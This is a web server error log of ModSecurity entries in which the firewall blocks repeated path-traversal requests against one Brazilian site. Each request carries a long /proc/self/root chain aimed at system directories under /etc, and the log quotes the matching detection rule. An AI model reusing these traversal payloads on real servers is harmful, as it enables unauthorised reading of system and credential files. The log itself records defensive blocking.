[Fri Mar 20 04:03:42.839264 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:42254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxTgF0L0L-SsrnPo47SAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:44.824617 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:42262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxUBCii7xarUs8iHY30QAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:47.278682 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:42274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxUxCii7xarUs8iHY32QAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:00.085452 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:42046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxYPqxLDW4GITHUkS1JwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:01.505522 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.241.31:35634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxYbninkcc-iUj5Aow6AAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:02.922971 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:35638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxYgF0L0L-SsrnPo47UQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:04.243421 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:35646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxZBCii7xarUs8iHY38AAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:05.920797 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:35662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxZfXLqtnMIWvjpaJsbwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:07.318616 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:40180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxZ_HIg5MgXLBnicPOkwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:09.718597 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.241.31:40188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxaV1pVZ5mVmJwsFMEYwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:15.248491 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:40200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxbhCii7xarUs8iHY3_QAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:16.675030 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:40214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxcBCii7xarUs8iHY4AAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:20.548659 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:45138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxc_qxLDW4GITHUkS1MwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:22.970964 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.241.31:45150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxdrninkcc-iUj5Aow8AAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:25.413903 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:45162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxeda6ubjKNq_cu4aiYwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:26.720117 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:45174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxevqxLDW4GITHUkS1NQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:28.083273 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:41724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxfAF0L0L-SsrnPo47XQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:04:46.215596 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:34296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxjhCii7xarUs8iHY4LgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:48.659629 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:50988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxkLninkcc-iUj5Aow_QAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:49.965656 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.243.128:41228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxkfHIg5MgXLBnicPOsAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:04:50.724544 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:41734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxkhCii7xarUs8iHY4MwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
